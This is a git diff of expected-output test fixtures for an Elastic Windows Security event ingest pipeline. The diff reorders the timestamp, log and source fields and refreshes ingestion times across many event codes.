--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4759.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4759.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:26:26.143Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4759.xml" - } - }, - "@timestamp": "2019-12-19T08:26:26.143Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4759.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:49.162535600Z", + "ingested": "2021-12-14T14:55:42.614057428Z", "code": "4759", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4760.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4760.json-expected.json index 60497ade63b..8ae18e5d50e 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4760.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4760.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:28:21.030Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { 
@@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4760.xml" - } - }, - "@timestamp": "2019-12-19T08:28:21.030Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4760.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:49.356213Z", + "ingested": "2021-12-14T14:55:42.807120269Z", "code": "4760", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4761.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4761.json-expected.json index 1c4f746a96e..1ec6036abca 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4761.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4761.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:29:38.448Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4761.xml" - } - }, - "@timestamp": "2019-12-19T08:29:38.448Z", "ecs": { "version": "1.12.0" }, 
@@ -60,11 +54,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4761.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:49.561917300Z", + "ingested": "2021-12-14T14:55:43.000331714Z", "code": "4761", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4762.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4762.json-expected.json index f8891896198..8106624d6e3 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4762.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4762.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:33:25.967Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4762.xml" - } - }, - "@timestamp": "2019-12-19T08:33:25.967Z", "ecs": { "version": "1.12.0" }, @@ -60,11 +54,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4762.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:49.822688Z", + "ingested": "2021-12-14T14:55:43.269154696Z", "code": "4762", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4763.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4763.json-expected.json index 1adcefc4726..e5d62aef3ed 100644 
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4763.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4763.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:34:23.162Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -42,13 +43,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4763.xml" - } - }, - "@timestamp": "2019-12-19T08:34:23.162Z", "ecs": { "version": "1.12.0" }, @@ -57,11 +51,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4763.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:50.082779300Z", + "ingested": "2021-12-14T14:55:43.527963590Z", "code": "4763", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4817-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4817-windowssrv2016.json-expected.json index 68ec14da47f..c742dde3129 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4817-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4817-windowssrv2016.json-expected.json @@ -65,7 +65,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:50.270227300Z", + "ingested": "2021-12-14T14:55:43.719761555Z", "code": "4817", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4902-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4902-windowssrv2016.json-expected.json index b170f36ffed..0ae10581113 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4902-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4902-windowssrv2016.json-expected.json @@ -47,7 +47,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:50.449397500Z", + "ingested": "2021-12-14T14:55:43.900717433Z", "code": "4902", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4904-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4904-windowssrv2016.json-expected.json index 270cb476576..73e738db59b 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4904-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4904-windowssrv2016.json-expected.json @@ -13,6 +13,7 @@ "pid": 3608, "executable": "C:\\Windows\\System32\\inetsrv\\inetinfo.exe" }, + "@timestamp": "2020-08-19T07:56:52.019Z", "winlog": { "computer_name": "WIN-BVM4LI1L1Q6.TEST.local", "process": { @@ -46,13 +47,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4904_WindowsSrv2016.xml" - } - }, - "@timestamp": "2020-08-19T07:56:52.019Z", "ecs": { "version": "1.12.0" }, 
@@ -61,11 +55,17 @@ "WIN-BVM4LI1L1Q6$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4904_WindowsSrv2016.xml" + } + }, "host": { "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:50.573813200Z", + "ingested": "2021-12-14T14:55:44.021905844Z", "code": "4904", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4905-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4905-windowssrv2016.json-expected.json index cb85f92ff19..ddc7da6dff6 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4905-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4905-windowssrv2016.json-expected.json @@ -13,6 +13,7 @@ "pid": 4964, "executable": "-" }, + "@timestamp": "2020-08-19T07:56:51.579Z", "winlog": { "computer_name": "WIN-BVM4LI1L1Q6.TEST.local", "process": { @@ -46,13 +47,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4905_WindowsSrv2016.xml" - } - }, - "@timestamp": "2020-08-19T07:56:51.579Z", "ecs": { "version": "1.12.0" }, @@ -61,11 +55,17 @@ "WIN-BVM4LI1L1Q6$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4905_WindowsSrv2016.xml" + } + }, "host": { "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:50.772922Z", + "ingested": "2021-12-14T14:55:44.216584848Z", "code": "4905", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4906-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4906-windowssrv2016.json-expected.json index 965c931df7c..b31f1160b66 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4906-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4906-windowssrv2016.json-expected.json @@ -46,7 +46,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:50.972826900Z", + "ingested": "2021-12-14T14:55:44.426493932Z", "code": "4906", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4907-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4907-windowssrv2016.json-expected.json index 39289698950..6959eeb870a 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4907-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4907-windowssrv2016.json-expected.json @@ -13,6 +13,7 @@ "pid": 4300, "executable": "C:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.1883_none_7ed84bd822106081\\TiWorker.exe" }, + "@timestamp": "2020-08-19T07:56:17.112Z", "winlog": { "computer_name": "WIN-BVM4LI1L1Q6.TEST.local", "process": { @@ -49,13 +50,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4907_WindowsSrv2016.xml" - } - }, - "@timestamp": "2020-08-19T07:56:17.112Z", "ecs": { "version": "1.12.0" }, 
@@ -64,11 +58,17 @@ "WIN-BVM4LI1L1Q6$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4907_WindowsSrv2016.xml" + } + }, "host": { "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:51.090769700Z", + "ingested": "2021-12-14T14:55:44.549978299Z", "code": "4907", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json index cc400c86fe1..1d548a9a1a2 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json @@ -13,6 +13,7 @@ "pid": 496, "executable": "C:\\Windows\\System32\\lsass.exe" }, + "@timestamp": "2020-04-06T06:39:04.549Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -48,13 +49,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4673.xml" - } - }, - "@timestamp": "2020-04-06T06:39:04.549Z", "ecs": { "version": "1.12.0" }, @@ -63,11 +57,17 @@ "DC_TEST2K12$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4673.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:51.283482500Z", + "ingested": "2021-12-14T14:55:44.744026785Z", "code": "4673", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json index 2df6677e8d6..44683d34a71 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2020-04-02T14:34:08.889Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4697.xml" - } - }, - "@timestamp": "2020-04-02T14:34:08.889Z", "ecs": { "version": "1.12.0" }, @@ -59,6 +53,12 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4697.xml" + } + }, "service": { "name": "winlogbeat", "type": "Win32 Own Process" @@ -67,7 +67,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:51.472412500Z", + "ingested": "2021-12-14T14:55:44.937890239Z", "code": "4697", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json index 9f0d8dc52ac..b6710943e6f 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json 
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json @@ -77,7 +77,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:51.665278200Z", + "ingested": "2021-12-14T14:55:45.137243455Z", "code": "4768", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json index f7cfee07f33..246dfeeca65 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json @@ -76,7 +76,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:51.894330100Z", + "ingested": "2021-12-14T14:55:45.357321973Z", "code": "4769", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json index 25f40fe47fd..9b79794d544 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json @@ -71,7 +71,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:52.108288400Z", + "ingested": "2021-12-14T14:55:45.571137278Z", "code": "4770", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json index a9bd7c27946..1504465c5ab 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json @@ -73,7 +73,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:52.303560800Z", + "ingested": "2021-12-14T14:55:45.772014668Z", "code": "4771", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json index d77ad8dd952..7c9c40c02ab 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json @@ -59,7 +59,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:52.499134700Z", + "ingested": "2021-12-14T14:55:45.966638282Z", "code": "4776", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json index 1debe07b396..0a50d1966c9 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json 
@@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2020-04-05T16:33:32.388Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -40,17 +41,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4778.xml" - } - }, - "source": { - "ip": "10.100.150.9", - "domain": "EQP01777" - }, - "@timestamp": "2020-04-05T16:33:32.388Z", "ecs": { "version": "1.12.0" }, @@ -62,11 +52,21 @@ "10.100.150.9" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4778.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, + "source": { + "ip": "10.100.150.9", + "domain": "EQP01777" + }, "event": { - "ingested": "2021-12-09T13:45:52.652424900Z", + "ingested": "2021-12-14T14:55:46.117822268Z", "code": "4778", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json index 9ca3a755534..59a0a266179 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2020-04-03T10:18:01.882Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { 
@@ -40,17 +41,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4779.xml" - } - }, - "source": { - "ip": "10.100.150.17", - "domain": "EQP01777" - }, - "@timestamp": "2020-04-03T10:18:01.882Z", "ecs": { "version": "1.12.0" }, @@ -62,11 +52,21 @@ "10.100.150.17" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4779.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, + "source": { + "ip": "10.100.150.17", + "domain": "EQP01777" + }, "event": { - "ingested": "2021-12-09T13:45:52.832864500Z", + "ingested": "2021-12-14T14:55:46.295611755Z", "code": "4779", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json index 587d54b2f61..1b5e322223b 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json @@ -13,6 +13,7 @@ "pid": 508, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2019-03-29T21:10:39.786Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -59,13 +60,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:10:39.786Z", "ecs": { "version": "1.12.0" }, 
@@ -75,11 +69,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021187300Z", + "ingested": "2021-12-14T14:55:46.477094863Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -111,6 +111,7 @@ "pid": 508, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2019-03-29T21:10:40.255Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -157,13 +158,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:10:40.255Z", "ecs": { "version": "1.12.0" }, @@ -173,11 +167,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021197900Z", + "ingested": "2021-12-14T14:55:46.477097371Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -281,7 +281,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021202700Z", + "ingested": "2021-12-14T14:55:46.477097882Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -313,6 +313,7 @@ "pid": 508, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2019-03-29T21:10:40.505Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { 
@@ -359,13 +360,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:10:40.505Z", "ecs": { "version": "1.12.0" }, @@ -375,11 +369,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021209700Z", + "ingested": "2021-12-14T14:55:46.477098278Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -411,6 +411,7 @@ "pid": 0, "executable": "-" }, + "@timestamp": "2019-03-29T21:10:40.630Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -457,13 +458,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:10:40.630Z", "ecs": { "version": "1.12.0" }, @@ -472,11 +466,17 @@ "ANONYMOUS LOGON" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021216800Z", + "ingested": "2021-12-14T14:55:46.477098699Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -508,6 +508,7 @@ "pid": 0, "executable": "-" }, + "@timestamp": "2019-03-29T21:10:53.661Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { 
@@ -554,13 +555,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:10:53.661Z", "ecs": { "version": "1.12.0" }, @@ -569,11 +563,17 @@ "vagrant" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021221100Z", + "ingested": "2021-12-14T14:55:46.477099120Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -605,6 +605,7 @@ "pid": 0, "executable": "-" }, + "@timestamp": "2019-03-29T21:10:54.661Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -651,13 +652,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:10:54.661Z", "ecs": { "version": "1.12.0" }, @@ -666,11 +660,17 @@ "vagrant" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021226100Z", + "ingested": "2021-12-14T14:55:46.477099558Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -702,6 +702,7 @@ "pid": 0, "executable": "-" }, + "@timestamp": "2019-03-29T21:10:55.458Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { 
